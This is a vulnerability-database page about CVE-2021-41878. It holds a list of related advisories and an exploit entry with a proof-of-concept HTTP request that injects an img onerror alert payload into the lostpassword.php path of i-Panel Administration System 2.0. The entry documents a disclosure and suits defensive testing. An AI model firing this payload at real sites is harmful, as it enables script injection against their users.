| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| i-Panel Administration System 2.0 - Reflected Cross-site Scripting Vulnerability | 13 Oct 202100:00 | – | zdt | |
| CVE-2021-41878 | 4 Oct 202112:15 | – | attackerkb | |
| Security Bulletin:IBM TRIRIGA Application Platform discloses possible path command execution(CVE-2021-41878) | 27 Sep 202219:11 | – | ibm | |
| CVE-2021-41878 | 4 Oct 202116:23 | – | circl | |
| i-Panel Administration System 跨站脚本漏洞 | 4 Oct 202100:00 | – | cnnvd | |
| CVE-2021-41878 | 4 Oct 202111:58 | – | cve | |
| CVE-2021-41878 | 4 Oct 202111:58 | – | cvelist | |
| U.S. Dept Of Defense: XSS on ( █████████.gov ) Via URL path | 8 Jan 202306:35 | – | hackerone | |
| i-Panel Administration System 2.0 - Cross-Site Scripting | 18 Jul 202608:12 | – | nuclei | |
| CVE-2021-41878 | 4 Oct 202112:15 | – | nvd |
# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
# Date: 04.10.2021
# Exploit Author: Forster Chiu
# Vendor Homepage: https://www.hkurl.com
# Version: 2.0
# Tested on: Chrome, Edge and Firefox
# CVE: CVE-2021-41878
# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
As a proof of concept, an alert box can be generated with the following payload.
Exploit PoC:
GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
Host: Forster
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Connection: closeData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation